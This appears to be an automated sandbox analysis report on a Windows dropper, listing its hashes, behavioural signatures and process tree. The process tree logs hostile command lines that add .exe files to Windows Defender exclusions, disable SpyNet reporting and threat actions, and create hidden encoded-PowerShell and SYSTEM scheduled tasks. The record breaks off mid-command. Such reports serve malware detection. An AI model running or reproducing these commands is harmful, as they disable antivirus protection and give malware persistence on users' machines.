Analysis
  max time kernel: 91s
  max time network: 105s
  platform: windows10-2004_x64
  resource: win10v2004-20220812-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 06/02/2023, 10:56
Static task: static1
Behavioral task: behavioral1
  Sample: 627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe
  Resource: win7-20220901-en
General
  Target: 627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe
  Size: 7.3MB
  MD5: e9df6a41ca4941817e0da65dd35d6508
  SHA1: d1efb6b9745f5fcf6f34a0e4f7d148133a4289eb
  SHA256: 627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c
  SHA512: 7b850ea47e68386168db3d64e094347ebb87717d690a395352084cf8dd334449f382dff75eba04770e112ec85f742204d4ac592a1513327c5588c10f28490f54
  SSDEEP: 196608:91OTdISgFWHU76tSdBQ2EfgFLfCceIqTMf:3OTGy0WS/QloFLbe+
Malware Config
Signatures
Blocklisted process makes network request (1 IoC)
  flow | pid | Process
  111 | 3328 | rundll32.exe

Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | BPTxocp.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | Install.exe

Executes dropped EXE (4 IoCs)
  pid | Process
  3804 | Install.exe
  1532 | Install.exe
  1336 | jJeKaBi.exe
  4876 | BPTxocp.exe

Loads dropped DLL (1 IoC)
  pid | Process
  3328 | rundll32.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Drops Chrome extension (1 IoC)
  description | ioc | Process
  File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json | BPTxocp.exe

Drops desktop.ini file(s) (1 IoC)
  description | ioc | Process
  File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | BPTxocp.exe
Drops file in System32 directory (27 IoCs)
  description | ioc | Process
  File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | jJeKaBi.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | BPTxocp.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 | BPTxocp.exe
  File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | BPTxocp.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | BPTxocp.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 | BPTxocp.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | BPTxocp.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 | BPTxocp.exe
  File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | jJeKaBi.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | BPTxocp.exe
  File created | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
  File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | BPTxocp.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | BPTxocp.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 | BPTxocp.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | BPTxocp.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | BPTxocp.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5FEB33CBE0463E334B23E93A48C2DB5C | BPTxocp.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | BPTxocp.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5FEB33CBE0463E334B23E93A48C2DB5C | BPTxocp.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | BPTxocp.exe
  File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | BPTxocp.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | BPTxocp.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | BPTxocp.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | BPTxocp.exe
Drops file in Program Files directory (14 IoCs)
  description | ioc | Process
  File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | BPTxocp.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | BPTxocp.exe
  File created | C:\Program Files (x86)\phVJOPZyZJOU2\OHkMzQnNjMomW.dll | BPTxocp.exe
  File created | C:\Program Files (x86)\NCzfTsUHwfUn\GiGykRm.dll | BPTxocp.exe
  File created | C:\Program Files (x86)\wRZxVByAcqfAC\buiJeUm.xml | BPTxocp.exe
  File created | C:\Program Files (x86)\JuPVqtTuU\HMQNMm.dll | BPTxocp.exe
  File created | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | BPTxocp.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | BPTxocp.exe
  File created | C:\Program Files (x86)\phVJOPZyZJOU2\ZsJuKYO.xml | BPTxocp.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | BPTxocp.exe
  File created | C:\Program Files (x86)\JuPVqtTuU\ZDJrKBR.xml | BPTxocp.exe
  File created | C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR\oowRbnY.dll | BPTxocp.exe
  File created | C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR\wRkuupv.xml | BPTxocp.exe
  File created | C:\Program Files (x86)\wRZxVByAcqfAC\JPcIrlh.dll | BPTxocp.exe

Drops file in Windows directory (4 IoCs)
  description | ioc | Process
  File created | C:\Windows\Tasks\ygwXmmYWmIOQZqgey.job | schtasks.exe
  File created | C:\Windows\Tasks\HnhGGmYUcuANzZs.job | schtasks.exe
  File created | C:\Windows\Tasks\ClHbhijVssadMpWzU.job | schtasks.exe
  File created | C:\Windows\Tasks\bsajrHInQFlcwYICLj.job | schtasks.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTP, 11 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  2892 | schtasks.exe
  1840 | schtasks.exe
  3584 | schtasks.exe
  3520 | schtasks.exe
  1104 | schtasks.exe
  3388 | schtasks.exe
  1840 | schtasks.exe
  3284 | schtasks.exe
  4016 | schtasks.exe
  1512 | schtasks.exe
  2708 | schtasks.exe

Enumerates system info in registry (2 TTPs, 4 IoCs)
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Modifies data under HKEY_USERS (64 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket | BPTxocp.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | BPTxocp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | rundll32.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | rundll32.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | BPTxocp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | BPTxocp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2fb4ccdc-0000-0000-0000-d01200000000} | BPTxocp.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | BPTxocp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2fb4ccdc-0000-0000-0000-d01200000000}\MaxCapacity = "15140" | BPTxocp.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2fb4ccdc-0000-0000-0000-d01200000000}\NukeOnDelete = "0" | BPTxocp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume | BPTxocp.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | BPTxocp.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "7" | BPTxocp.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | BPTxocp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | BPTxocp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Suspicious behavior: EnumeratesProcesses (44 IoCs)
  pid | Process
  2120 | powershell.EXE (2 entries)
  4780 | powershell.exe (2 entries)
  4388 | powershell.exe (2 entries)
  5056 | powershell.EXE (2 entries)
  4876 | BPTxocp.exe (36 entries)

Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 2120 | powershell.EXE
  Token: SeDebugPrivilege | 4780 | powershell.exe
  Token: SeDebugPrivilege | 4388 | powershell.exe
  Token: SeDebugPrivilege | 5056 | powershell.EXE

Suspicious use of WriteProcessMemory (64 IoCs)
  description | pid | Process | procid_target
  PID 4572 wrote to memory of 3804 | 4572 | 627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe | 79 (3 entries)
  PID 3804 wrote to memory of 1532 | 3804 | Install.exe | 80 (3 entries)
  PID 1532 wrote to memory of 920 | 1532 | Install.exe | 81 (3 entries)
  PID 1532 wrote to memory of 1932 | 1532 | Install.exe | 83 (3 entries)
  PID 920 wrote to memory of 4876 | 920 | forfiles.exe | 85 (3 entries)
  PID 1932 wrote to memory of 4860 | 1932 | forfiles.exe | 86 (3 entries)
  PID 4876 wrote to memory of 5024 | 4876 | cmd.exe | 87 (3 entries)
  PID 4860 wrote to memory of 4868 | 4860 | cmd.exe | 88 (3 entries)
  PID 4860 wrote to memory of 5052 | 4860 | cmd.exe | 90 (1 entry)
  PID 4876 wrote to memory of 2220 | 4876 | cmd.exe | 89 (1 entry)
  PID 4860 wrote to memory of 5052 | 4860 | cmd.exe | 90 (2 entries)
  PID 4876 wrote to memory of 2220 | 4876 | cmd.exe | 89 (2 entries)
  PID 1532 wrote to memory of 2892 | 1532 | Install.exe | 91 (3 entries)
  PID 1532 wrote to memory of 3748 | 1532 | Install.exe | 93 (3 entries)
  PID 2120 wrote to memory of 2116 | 2120 | powershell.EXE | 97 (2 entries)
  PID 1532 wrote to memory of 5064 | 1532 | Install.exe | 104 (3 entries)
  PID 1532 wrote to memory of 1840 | 1532 | Install.exe | 106 (3 entries)
  PID 1336 wrote to memory of 4780 | 1336 | jJeKaBi.exe | 114 (3 entries)
  PID 4780 wrote to memory of 2240 | 4780 | powershell.exe | 116 (3 entries)
  PID 2240 wrote to memory of 2144 | 2240 | cmd.exe | 117 (3 entries)
  PID 4780 wrote to memory of 2012 | 4780 | powershell.exe | 118 (3 entries)
  PID 4780 wrote to memory of 2168 | 4780 | powershell.exe | 119 (3 entries)
  PID 4780 wrote to memory of 4180 | 4780 | powershell.exe | 120 (3 entries)
  PID 4780 wrote to memory of 1892 | 4780 | powershell.exe | 121 (2 entries)
Processes

Level 1: C:\Users\Admin\AppData\Local\Temp\627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe"
  PID: 4572
  - Suspicious use of WriteProcessMemory

  Level 2: C:\Users\Admin\AppData\Local\Temp\7zS78FD.tmp\Install.exe
    Command line: .\Install.exe
    PID: 3804
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    Level 3: C:\Users\Admin\AppData\Local\Temp\7zS7EF9.tmp\Install.exe
      Command line: .\Install.exe /S /site_id "525403"
      PID: 1532
      - Checks BIOS information in registry
      - Checks computer location settings
      - Executes dropped EXE
      - Drops file in System32 directory
      - Enumerates system info in registry
      - Suspicious use of WriteProcessMemory
      Level 4: C:\Windows\SysWOW64\forfiles.exe
        Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        PID: 920
        - Suspicious use of WriteProcessMemory

        Level 5: C:\Windows\SysWOW64\cmd.exe
          Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
          PID: 4876
          - Suspicious use of WriteProcessMemory

          Level 6: \??\c:\windows\SysWOW64\reg.exe
            Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
            PID: 5024

          Level 6: \??\c:\windows\SysWOW64\reg.exe
            Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
            PID: 2220
      Level 4: C:\Windows\SysWOW64\forfiles.exe
        Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        PID: 1932
        - Suspicious use of WriteProcessMemory

        Level 5: C:\Windows\SysWOW64\cmd.exe
          Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
          PID: 4860
          - Suspicious use of WriteProcessMemory

          Level 6: \??\c:\windows\SysWOW64\reg.exe
            Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
            PID: 4868

          Level 6: \??\c:\windows\SysWOW64\reg.exe
            Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
            PID: 5052
      Level 4: C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /CREATE /TN "gzyKvbkdY" /SC once /ST 08:11:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        PID: 2892
        - Creates scheduled task(s)

      Level 4: C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /run /I /tn "gzyKvbkdY"
        PID: 3748

      Level 4: C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /DELETE /F /TN "gzyKvbkdY"
        PID: 5064

      Level 4: C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /CREATE /TN "bsajrHInQFlcwYICLj" /SC once /ST 11:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC\nuKOVfXXHsnqFlD\jJeKaBi.exe\" yn /site_id 525403 /S" /V1 /F
        PID: 1840
        - Drops file in Windows directory
        - Creates scheduled task(s)
Level 1: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  PID: 2120
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  Level 2: C:\Windows\system32\gpupdate.exe
    Command line: "C:\Windows\system32\gpupdate.exe" /force
    PID: 2116

Level 1: C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
  PID: 220

Level 1: C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
  PID: 216

Level 1: C:\Windows\system32\gpscript.exe
  Command line: gpscript.exe /RefreshSystemParam
  PID: 752
Level 1: C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC\nuKOVfXXHsnqFlD\jJeKaBi.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC\nuKOVfXXHsnqFlD\jJeKaBi.exe yn /site_id 525403 /S
  PID: 1336
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory

  Level 2: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 